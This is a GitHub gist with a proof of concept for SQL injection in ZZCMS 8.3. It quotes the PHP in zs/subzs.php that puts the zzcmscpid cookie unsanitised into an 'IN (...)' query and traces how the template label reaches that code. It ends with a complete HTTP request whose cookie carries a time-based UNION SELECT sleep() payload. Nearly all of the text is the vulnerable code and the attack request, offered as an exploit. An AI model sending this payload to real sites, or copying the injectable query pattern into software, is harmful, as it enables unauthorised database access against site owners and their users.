Skip to content

Instantly share code, notes, and snippets.

@Lz1y Lz1y/ZZCMS sqlinject.md Secret
Created Aug 24, 2018

Embed
What would you like to do?
ZZCMS sqlinject

ZZCMS sqlinject

PoC by Lz1y

ZZCMS the lastest version download page :

http://www.zzcms.net/about/6.htm

zip installer:

http://www.zzcms.net/download/zzcms8.3.zip

vulnerability code:

in file zs/subzs.php line 1-24:

function showcookiezs($cs){
$str="";
$cs=explode(",",$cs); //传入的$cs是一个整体字符串,转成数组
$column=isset($cs[0])?$cs[0]:3;
$imgwidth=isset($cs[1])?$cs[1]:80;
$imgheight=isset($cs[2])?$cs[2]:80;
$title_num=isset($cs[3])?$cs[3]:6;
if (!isset($_COOKIE["zzcmscpid"])){
$str="暂无记录";
}else{
$cpid=$_COOKIE["zzcmscpid"];
if (strpos($cpid,",")>0){
$cpid=str_replace(" ","",$cpid);
$cpid=str_replace("deleted","",$cpid);//cookie会出现deleted的情况
$sql="select id,proname,img from zzcms_main where id in (".$cpid.")";
}else{
checkid($cpid);
$sql="select id,proname,img from zzcms_main where id='$cpid' ";
}
...

in file labels.php line 57-73,function fixed:

function fixed($cs,$channel){
switch ($channel){
case 'ad':return showad($cs); break;
case 'zs':return showzs($cs); break;
case 'dl':return showdl($cs); break;
case 'pp':return showpp($cs); break;
case 'job':return showjob($cs); break;
case 'zx':return showzx($cs); break;
case 'zh':return showzh($cs); break;
case 'announce':return showannounce($cs); break;
case 'cookiezs':return showcookiezs($cs); break;
case 'zsclass':return showzsclass($cs); break;
case 'keyword':return showkeyword($cs); break;
case 'province':return showprovince($cs); break;
case 'sitecount':return showsitecount($cs); break;
}
}
...

in file labels.php line 1-16:

<?php
//产品版
function showlabel($str){
global $b;//zsshow需要从zs/class.php获取$b;zxshow从s/class.php获取$b;
//checkver($str);
//固定标签
$channels=array('ad','zs','dl','zx','pp','job','zh','announce','cookiezs','zsclass','keyword','province','sitecount');
foreach ($channels as $value) {
if (strpos($str,"{#show".$value.":")!==false){
$n=count(explode("{#show".$value.":",$str));//循环之前取值
for ($i=1;$i<$n;$i++){
$cs=strbetween($str,"{#show".$value.":","}");
if ($cs<>''){$str=str_replace("{#show".$value.":".$cs."}",fixed($cs,$value),$str);} //$cs直接做为一个整体字符串参数传入,调用时再转成数组遍历每项值
}
}}

in file zs/zs.php line 342:

$strout=showlabel($strout);

line 204-207:

$fp="../template/".$siteskin."/zs.htm";
$f = fopen($fp,'r');
$strout = fread($f,filesize($fp));
fclose($f);

in file template/red13/zs.htm:

<div class="content1">{#showcookiezs:3,60,60}</div>

POC:

GET /zs/zs.php HTTP/1.1
Host: lzy.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: UserName=admin; zzcmscpid=1)%0aunion%0aselect%0asleep(0),2,3#,12); PHPSESSID=82cd4ed33d175f6a22d2ceeaf7f10e93;
Connection: close

sleep(0)

sleep(5)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.